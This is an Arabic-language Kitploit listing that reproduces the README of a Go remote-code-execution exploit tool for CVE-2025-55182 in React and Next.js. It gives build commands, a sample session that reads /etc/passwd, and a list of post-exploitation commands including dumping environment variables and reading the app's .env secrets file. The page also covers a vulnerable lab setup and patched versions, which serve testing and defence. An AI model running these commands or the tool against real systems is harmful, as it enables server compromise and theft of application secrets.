Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-55182 — أداة استغلال RCE تستهدف CVE-2025-55182، وهي ثغرة حرجة في React Server Components (RSC) تؤثر على React 19.0.0 - 19.2.0 وتطبيقات Next.js. | Kitploit
أدوات/GitHubGitHub/yyax13/cve-2025-55182
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالفريق الأحمرتطوير الحمولات
GitHubyyax13/cve-2025-55182

CVE-2025-55182

أداة استغلال RCE تستهدف CVE-2025-55182، وهي ثغرة حرجة في React Server Components (RSC) تؤثر على React 19.0.0 - 19.2.0 وتطبيقات Next.js.

عرض المستودع
1منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

👻 ثغرة CVE-2025-55182 أداة استغلال بلغة Go

أداة استغلال RCE تفاعلية لـ CVE-2025-55182 (مكونات خادم React)

GitHub Stars License Go

🎯 ما هذه الأداة؟

CVE-2025-55182 هي أداة استغلال RCE تفاعلية وبسيطة تستهدف CVE-2025-55182، وهي ثغرة حرجة في مكونات خادم React (RSC) تؤثر على React 19.0.0 - 19.2.0 وتطبيقات Next.js.


📦 التثبيت

المتطلبات الأساسية

  • Go 1.18 أو أحدث
  • هدف ضعيف يعمل بـ React 19.0.0 - 19.2.0

البناء من المصدر

root@kitploit:~
git clone https://github.com/Hghost0x00/CVE-2025-55182.git
cd CVE-2025-55182
go build -o CVE-2025-55182 main.go

🚀 الاستخدام

الاستخدام الأساسي

root@kitploit:~
./CVE-2025-55182

جلسة تفاعلية

root@kitploit:~
_____________   _______________         _______________   ________   .________          .________.____________  ______  ________  
╲_   ___ ╲   ╲ ╱   ╱╲_   _____╱         ╲_____  ╲   _  ╲  ╲_____  ╲  │   ____╱          │   ____╱│   ____╱_   │╱  __  ╲ ╲_____  ╲ 
╱    ╲  ╲╱╲   Y   ╱  │    __)_   ______  ╱  ____╱  ╱_╲  ╲  ╱  ____╱  │____  ╲   ______  │____  ╲ │____  ╲ │   │>      <  ╱  ____╱ 
╲     ╲____╲     ╱   │        ╲ ╱_____╱ ╱       ╲  ╲_╱   ╲╱       ╲  ╱       ╲ ╱_____╱  ╱       ╲╱       ╲│   ╱   ──   ╲╱       ╲ 
 ╲______  ╱ ╲___╱   ╱_______  ╱         ╲_______ ╲_____  ╱╲_______ ╲╱______  ╱         ╱______  ╱______  ╱│___╲______  ╱╲_______ ╲
        ╲╱                  ╲╱                  ╲╱     ╲╱         ╲╱       ╲╱                 ╲╱       ╲╱            ╲╱         ╲╱  

    React2Shell RCE | CVE-2025-55182
    @hghost010

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[?] الهدف: localhost:3000
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[+] ضعيف
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

ghost@rce $ id
uid=1000(node) gid=1000(node) groups=1000(node)

ghost@rce $ whoami
node

ghost@rce $ pwd
/app

ghost@rce $ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
node:x:1000:1000::/home/node:/bin/bash

ghost@rce $ exit

🎥 عرض توضيحي

https://github.com/user-attachments/assets/9cfdc436-9217-4921-bdbd-1368378f049f


الإصدارات المتأثرة:

  • React 19.0.0، 19.1.0، 19.1.1، 19.2.0
  • تطبيقات Next.js التي تستخدم إصدارات React هذه

الإصدارات المصححة:

  • React 19.2.1+
  • Next.js مع تبعية React المحدّثة

🧪 إعداد مختبر الاختبار

هل تريد اختبار هذا بأمان؟ قم بإعداد بيئة مختبر ضعيفة:

root@kitploit:~
# Clone vulnerable Next.js app
git clone https://github.com/zack0x01/vuln-app-CVE-2025-55182.git
cd vuln-app-CVE-2025-55182

# Install and run
npm install --legacy-peer-deps
npm run dev

# In another terminal, run ghost-scanner
./CVE-2025-55182
# Enter: localhost:3000

📚 الأوامر الشائعة

root@kitploit:~
ghost@rce $ id                    # Check user privileges
ghost@rce $ whoami                # Current username
ghost@rce $ pwd                   # Current directory
ghost@rce $ ls -la                # List files
ghost@rce $ cat /etc/passwd       # Read files
ghost@rce $ uname -a              # System information
ghost@rce $ env                   # Environment variables
ghost@rce $ ps aux                # Running processes
ghost@rce $ netstat -tulpn        # Network connections
ghost@rce $ cat /app/.env         # Application secrets

📊 إحصائيات المستودع

GitHub repo size GitHub last commit GitHub issues


🔗 المراجع

  • تفاصيل CVE-2025-55182
  • استشارة أمان React
  • استشارة أمان Next.js
  • إثبات المفهوم الأصلي بواسطة maple3142
  • بحث Assetnote
  • تطبيق اختبار ضعيف

💬 المجتمع والدعم

  • 🐦 تويتر/X: @hghost010
  • 🐙 GitHub: Hghost0x00

وجدت خطأ؟ افتح مشكلة


⭐ أظهر دعمك

إذا ساعدتك هذه الأداة:

  • ⭐ قم بنجم هذا المستودع
  • 💬 شارك مع الآخرين

📝 الترخيص

هذا المشروع مرخص بموجب رخصة MIT - انظر ملف LICENSE للتفاصيل.


مصنوع بـ 👻 بواسطة Hghost0x00
اختراق سعيد ⚡

تنزيل الأداة